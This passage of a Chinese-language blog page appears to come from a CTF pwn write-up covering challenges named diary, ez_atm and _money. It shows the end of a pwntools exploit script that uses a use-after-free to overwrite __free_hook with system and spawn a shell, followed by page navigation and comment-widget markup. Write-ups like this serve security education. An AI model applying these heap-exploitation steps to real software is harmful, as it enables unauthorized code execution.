class="line"></span><br><span class="line">login(<span class="string">b&#x27;196082&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x6</span>), <span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>)</span><br><span class="line">delete_account(<span class="string">b&#x27;X&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x7</span>)</span><br><span class="line"></span><br><span class="line">password = heap_base + <span class="number">0x620</span></span><br><span class="line">account = heap_base + <span class="number">0x10</span></span><br><span class="line"></span><br><span class="line">login(flat(account).ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>), flat(password))</span><br><span class="line">update_info(flat(free_hook, [<span class="number">0</span>]*<span class="number">4</span>), flat(password))</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;fuck_man&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*(<span class="number">0x20</span>-<span class="number">0x8</span>), <span class="string">b&#x27;SB&#x27;</span>+<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x6</span>, <span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">exit_account()</span><br><span class="line">new_account(<span class="string">b&#x27;\x00&#x27;</span>*<span class="number">0x20</span>, flat(system_addr), <span class="number">0x0</span>)</span><br><span class="line">exit_account()</span><br><span class="line">login(<span class="string">b&#x27;elephant&#x27;</span>.ljust(<span class="number">0x20</span>, <span class="string">b&#x27;\x00&#x27;</span>), <span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">delete_account(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(r, &#x27;b*$rebase(0x187C)&#x27;)</span></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


                    
                </div>

                

                <div class="post-bottom-tags-and-share border-box">
                    <div>
                        
                            <ul class="post-tags-box border-box">
                                
                                    <li class="tag-item border-box">
                                        <i class="icon fas fa-hashtag"></i>&nbsp;<a href="/tags/UAF/">UAF</a>
                                    </li>
                                
                            </ul>
                        
                    </div>
                    <div>
                        
                    </div>
                </div>

                
                    

<div class="reward-author-container border-box flex-center">
    <div class="reward-btn border-box flex-center tooltip tooltip-img"
            data-tooltip-img-url="/images/reward.jpg"
            data-tooltip-img-trigger="click"
            data-tooltip-img-style="top: -6px;"
    >
        <i class="fa-solid fa-mug-hot"></i>&nbsp;激励牛马，加速创作！
    </div>
</div>

                

                
                    <div class="post-nav border-box">
                        
                            <div class="prev-post">
                                <a class="prev"
                                   rel="prev"
                                   href="/2023/05/24/pipe-buffer/"
                                   title="向pipe_buffer说yes！"
                                >
                                    <span class="left arrow-icon flex-center">
                                        <i class="fas fa-chevron-left"></i>
                                    </span>
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">向pipe_buffer说yes！</span>
                                        <span class="post-nav-item">上一篇</span>
                                    </span>
                                </a>
                            </div>
                        
                        
                            <div class="next-post">
                                <a class="next"
                                   rel="next"
                                   href="/2023/04/20/io-uring/"
                                   title="io_uring在kernel pwn中的优异表现"
                                >
                                    <span class="title flex-center">
                                        <span class="post-nav-title-item text-ellipsis">io_uring在kernel pwn中的优异表现</span>
                                        <span class="post-nav-item">下一篇</span>
                                    </span>
                                    <span class="right arrow-icon flex-center">
                                        <i class="fas fa-chevron-right"></i>
                                    </span>
                                </a>
                            </div>
                        
                    </div>
                

                
                    


    <div class="comments-container border-box">
        <div id="comments-anchor" class="comment-area-title border-box">
            <i class="fas fa-comments"></i>&nbsp;评论
        </div>
        <div class="comment-plugin-fail border-box">
    <span class="fail-tip">评论插件加载失败</span>
    <button class="reload keep-button">点击重新加载</button>
</div>
<div class="comment-plugin-loading flex-center border-box">
    <i class="loading-icon fa-solid fa-spinner fa-spin"></i>
    <span class="load-tip">正在加载评论插件</span>
</div>
<script data-pjax>
  window.KeepCommentPlugin = {}
  window.KeepCommentPlugin.hideLoading = () => {
    const cplDom = document.querySelector('.comments-container .comment-plugin-loading')
    cplDom.style.display = 'none'
  }
  window.KeepCommentPlugin.loadFailHandle = () => {
    window.KeepCommentPlugin.hideLoading()
    const cpfDom = document.querySelector('.comments-container .comment-plugin-fail')
    cpfDom.style.display = 'flex'
    cpfDom.querySelector('.reload').addEventListener('click', () => {
      window.location.reload()
    })
  }
</script>

        
            

    <div class="valine-container">
        <div id="vcomments"></div>
        <script 
                src="//cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js"
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        ></script>
        <script 
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        >
          window.KeepCommentPlugin.initValine = () => {
            const config = {
              el: '#vcomments',
              appId: 'OcvtJuJHDrSFIyDGdp3rLMtA-gzGzoHsz',
              appKey: 'C672AAYGXMkHxztf8ntdLShs',
              meta: ['nick', 'mail', 'link'],
              avatar: 'wavatar',
              enableQQ: true,
              placeholder: '😜若有问题请各位大师傅留言评论',
              lang: 'zh-CN'.toLowerCase()
            }

            if ('') {
              config.serverURLs = ''
            }

            if (window?.Valine) {
              new Valine(config)
              window.KeepCommentPlugin.hideLoading()
            } else {
              setTimeout(() => {
                window.KeepCommentPlugin.initValine()
              }, 1000)
            }
          }

          if ('false' === 'true') {
            setTimeout(() => {
              window.KeepCommentPlugin.initValine()
            }, 1200)
          } else {
            window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initValine)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
            <div class="pc-post-toc right-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#diary"><span class="nav-text">diary</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ez-atm"><span class="nav-text">ez_atm</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-1"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-1"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#money"><span class="nav-text">_money</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-2"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-2"><span class="nav-text">exp</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
        &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2024
        
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">196082</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    
        
        <div class="deploy-info info-item">
            
            本站由 <span class="tooltip" data-tooltip-content="GitHub Pages"><img src="/images/brands/github.png"></span> 提供部署服务
            
        </div>
    

    
        <div class="count-info info-item">
            
                <span class="count-item border-box word">
                    <span class="item-type border-box">总字数</span>
                    <span class="item-value border-box word">335.6k</span>
                </span>
            

            
                <span class="count-item border-box uv">
                    <span class="item-type border-box">访客数</span>
                    <span class="item-value border-box uv" id="busuanzi_value_site_uv"></span>
                </span>
            

            
                <span class="count-item border-box pv">
                    <span class="item-type border-box">访问量</span>
                    <span class="item-value border-box pv" id="busuanzi_value_site_pv"></span>
                </span>
            
        </div>
    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        
            <li class="tools-item flex-center toggle-show-toc">
                <i class="fas fa-list"></i>
            </li>
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        
            <li class="tools-item rss flex-center">
                <a class="flex-center"
                   href="/atom.xml"
                   target="_blank"
                >
                    <i class="fas fa-rss"></i>
                </a>
            </li>
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        
            <li class="tools-item toggle-show-toc-tablet flex-center">
                <i class="fas fa-list"></i>
            </li>
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap border-box">
    <div class="post-toc border-box">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#diary"><span class="nav-text">diary</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ez-atm"><span class="nav-text">ez_atm</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-1"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-1"><span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#money"><span class="nav-text">_money</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90-2"><span class="nav-text">利用分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-2"><span class="nav-text">exp</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>





<!-- common js -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/utils.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/header-shrink.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/back2top.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/toggle-theme.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/code-block.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/main.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/libs/anime.min.js"></script>

<!-- local search -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/local-search.min.js"></script>


<!-- lazyload -->

    <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/lazyload.min.js"></script>


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/post/post-helper.min.js"></script>

        <!-- toc -->
        
            <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-theme-keep/4.2.2/js/post/toc.min.js"></script>
        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
